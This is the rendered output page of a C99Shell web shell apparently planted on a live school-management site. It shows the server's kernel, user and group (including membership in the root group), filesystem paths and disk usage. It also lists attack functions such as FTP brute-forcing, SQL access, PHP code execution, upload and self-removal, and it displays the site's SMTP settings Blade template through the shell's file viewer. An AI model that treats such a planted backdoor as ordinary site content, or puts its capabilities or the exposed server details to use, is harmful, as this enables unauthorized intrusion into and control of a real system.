!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/resources/views/superadmin/settings/   drwxr-xr-x
Free 29.42 GB of 117.98 GB (24.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     smtp_settings.blade.php (3.47 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('superadmin.navigation')
   
@section('content')
<div class="mainSection-title">
    <div class="row">
        <div class="col-12">
            <div class="d-flex justify-content-between align-items-center">
                <h4>{{ get_phrase('Smtp Settings') }}</h4>
            </div>
        </div>
    </div>
</div>

<div class="row">
    <div class="col-12">
        <div class="eSection-wrap">
            <div class="eMain">
                <div class="row">
                    <div class="col-md-6 pb-3">
                        <div class="eForm-layouts">
                            <form method="POST" enctype="multipart/form-data" class="d-block ajaxForm" action="{{ route('superadmin.smtp.update') }}">
                                @csrf 
                                <div class="fpb-7">
                                    <label for="smtp_protocol" class="eForm-label">{{ get_phrase('Protocol') }} <small>(smtp or ssmtp or mail)</small> </label>
                                    <input type="text" class="form-control eForm-control" value="{{ get_settings('smtp_protocol') }}" id="smtp_protocol" name = "smtp_protocol" required>
                                </div>
                                <div class="fpb-7">
                                    <label for="smtp_crypto" class="eForm-label">{{ get_phrase('Smtp crypto') }} <small>(ssl or tls)</small></label>
                                     <input type="text" class="form-control eForm-control" value="{{ get_settings('smtp_crypto') }}" id="smtp_crypto" name = "smtp_crypto" required>
                                </div>
                                <div class="fpb-7">
                                    <label for="smtp_host" class="eForm-label">{{ get_phrase('Smtp host') }}</label>
                                    <input type="text" class="form-control eForm-control" value="{{ get_settings('smtp_host') }}" id="smtp_host" name = "smtp_host" required>
                                </div>
                                <div class="fpb-7">
                                    <label for="smtp_port" class="eForm-label">{{ get_phrase('Smtp port') }}</label>
                                    <input type="text" class="form-control eForm-control" value="{{ get_settings('smtp_port') }}" id="smtp_port" name = "smtp_port" required>
                                </div>
                                <div class="fpb-7">
                                    <label for="smtp_user" class="eForm-label">{{ get_phrase('Smtp username') }}</label>
                                    <input type="text" class="form-control eForm-control" value="{{ get_settings('smtp_user') }}" id="smtp_user" name = "smtp_user" required>
                                </div>
                                <div class="fpb-7">
                                    <label for="smtp_pass" class="eForm-label">{{ get_phrase('Smtp password') }}</label>
                                    <input type="text" class="form-control eForm-control" value="{{ get_settings('smtp_pass') }}" id="smtp_pass" name = "smtp_pass" required>
                                </div>
                                <div class="fpb-7 pt-2">
                                    <button type="submit" class="btn-form">{{ get_phrase('Save') }}</button>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>        
    </div>
</div>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0032 ]--